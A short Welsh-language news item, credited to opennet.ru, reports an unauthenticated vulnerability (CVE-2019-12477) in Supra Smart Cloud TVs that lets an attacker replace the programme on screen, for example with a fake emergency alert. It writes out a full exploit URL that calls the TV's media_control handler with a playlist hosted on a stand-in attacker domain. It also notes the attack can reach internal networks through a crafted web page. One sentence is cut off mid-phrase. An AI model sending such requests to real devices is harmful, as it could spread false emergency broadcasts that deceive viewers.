Ar setiau teledu Supra Smart Cloud bregusrwydd (CVE-2019-12477) sy'n eich galluogi i ddisodli'r rhaglen a welir ar hyn o bryd gyda chynnwys yr ymosodwr. Er enghraifft, dangosir allbwn rhybudd ffug am sefyllfa o argyfwng.
Ar gyfer ymosodiad, mae'n ddigon anfon cais rhwydwaith wedi'i grefftio'n arbennig nad oes angen ei ddilysu. Yn benodol, gallwch gael mynediad at y triniwr β/remote/media_control?action=setUri&uri=β trwy nodi URL y ffeil m3u8 gyda pharamedrau fideo, er enghraifft βhttp://192.168.1.155/remote/media_control?action=setUri&uri= http://attacker .com/fake_broadcast_message.m3u8.β
Yn y rhan fwyaf o achosion, mae mynediad i gyfeiriad IP y teledu yn gyfyngedig i'r rhwydwaith mewnol, ond gan fod y cais yn cael ei anfon trwy HTTP, mae'n bosibl defnyddio dulliau i gael mynediad at adnoddau mewnol pan fydd y defnyddiwr yn agor tudalen allanol a ddyluniwyd yn arbennig (er enghraifft, o dan ffurf cais llun neu ddefnyddio'r ).
Ffynhonnell: opennet.ru